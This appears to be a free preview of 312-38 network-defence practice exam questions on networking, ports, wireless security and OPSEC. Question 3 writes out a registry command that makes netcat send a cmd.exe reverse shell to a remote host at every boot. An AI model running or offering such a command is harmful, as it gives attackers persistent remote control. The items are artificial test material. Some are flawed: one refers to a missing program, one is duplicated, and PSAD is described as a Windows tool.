312-38
Free trial
Verified
Question 1
John works as a C programmer. He develops the following C program:
His program is vulnerable to a __________ attack.
- A: SQL injection
- B: Denial-of-Service
- C: Buffer overflow
- D: Cross site scripting
Question 2
Which of the following fields in the IPv6 header is decremented by 1 for each router that forwards the packet?
- A: Flow label
- B: Next header
- C: Traffic class
- D: Hop limit
Question 3
You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command? Each correct answer represents a complete solution. Choose all that apply.
- A: You want to perform banner grabbing.
- B: You want to put Netcat in the stealth mode.
- C: You want to add the Netcat command to the Windows registry.
- D: You want to set the Netcat to execute command any time.
Question 4
You have just set up a wireless network for customers at a coffee shop. Which of the following are good security measures to implement? Each correct answer represents a complete solution. (Choose two.)
- A: Using WPA encryption
- B: Not broadcasting SSID
- C: Using WEP encryption
- D: MAC filtering the router
Question 5
Which of the following statements are true about a wireless network?
Each correct answer represents a complete solution. Choose all that apply.
- A: Data can be shared easily between wireless devices.
- B: It provides mobility to users to access a network.
- C: Data can be transmitted in different ways by using Cellular Networks, Mobitex, DataTAC, etc.
- D: It is easy to connect.
Question 6
Which of the following steps will NOT make a server fault tolerant? Each correct answer represents a complete solution. (Choose two.)
- A: Adding a second power supply unit
- B: Performing regular backup of the server
- C: Adding one more same sized disk as mirror on the server
- D: Implementing cluster servers' facility
- E: Encrypting confidential data stored on the server
Question 7
Which of the following steps of the OPSEC process examines each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then compare those indicators with the adversary's intelligence collection capabilities identified in the previous action?
- A: Analysis of Threats
- B: Application of Appropriate OPSEC Measures
- C: Identification of Critical Information
- D: Analysis of Vulnerabilities
- E: Assessment of Risk
Question 8
Which of the following statements are true about an IPv6 network? Each correct answer represents a complete solution. Choose all that apply.
- A: For interoperability, IPv4 addresses use the last 32 bits of IPv6 addresses.
- B: It increases the number of available IP addresses.
- C: It uses longer subnet masks than those used in IPv4.
- D: It provides improved authentication and security.
- E: It uses 128-bit addresses.
Question 9
Which of the following IP class addresses are not allotted to hosts? Each correct answer represents a complete solution. Choose all that apply.
- A: Class C
- B: Class D
- C: Class A
- D: Class B
- E: Class E
Question 10
Which of the following is a tool that runs on the Windows OS and analyzes iptables log messages to detect port scans and other suspicious traffic?
- A: PSAD
- B: Hping
- C: NetRanger
- D: Nmap
Question 11
DRAG DROP -
Drag and drop the terms to match with their descriptions.
Select and Place:
Question 12
Which of the following is a tool that runs on the Windows OS and analyzes iptables log messages to detect port scans and other suspicious traffic?
- A: Nmap
- B: Hping
- C: NetRanger
- D: PSAD
Question 13
What is the range for registered ports?
- A: 1024 through 49151
- B: 0 through 1023
- C: Above 65535
- D: 49152 through 65535
Question 14
How many layers are present in the TCP/IP model?
- A: 10
- B: 5
- C: 4
- D: 7
Question 15
In which of the following transmission modes is communication uni-directional?
- A: Root mode
- B: Full-duplex mode
- C: Half-duplex mode
- D: Simplex mode
Question 16
CSMA/CD is specified in which of the following IEEE standards?
- A: 802.3
- B: 802.2
- C: 802.1
- D: 802.15
Question 17
Which of the following IEEE standards defines a physical bus topology?
- A: 802.4
- B: 802.5
- C: 802.6
- D: 802.3
Question 18
Which of the following protocols is used for inter-domain multicast routing?
- A: BGP
- B: RPC
- C: VoIP
- D: RADIUS
Question 19
How many layers are present in the OSI layer model?
- A: 5
- B: 4
- C: 7
- D: 9
Question 20
Which of the following layers of the OSI model provides physical addressing?
- A: Application layer
- B: Network layer
- C: Physical layer
- D: Data link layer
Question 21
Token Ring is standardized by which of the following IEEE standards?
- A: 802.2
- B: 802.4
- C: 802.3
- D: 802.1
Question 22
Which of the following TCP/IP state transitions represents no connection state at all?
- A: Closed
- B: Closing
- C: Close-wait
- D: Fin-wait-1
Question 23
What is the range for private ports?
- A: 49152 through 65535
- B: 1024 through 49151
- C: Above 65535
- D: 0 through 1023
Question 24
Which of the following layers provides communication session management between host computers?
- A: Application layer
- B: Internet layer
- C: Transport layer
- D: Link layer
Question 25
Which of the following cables is made of glass or plastic and transmits signals in the form of light?
- A: Coaxial cable
- B: Twisted pair cable
- C: Plenum cable
- D: Fiber optic cable
Free preview mode
Enjoy the free questions and consider upgrading to gain full access!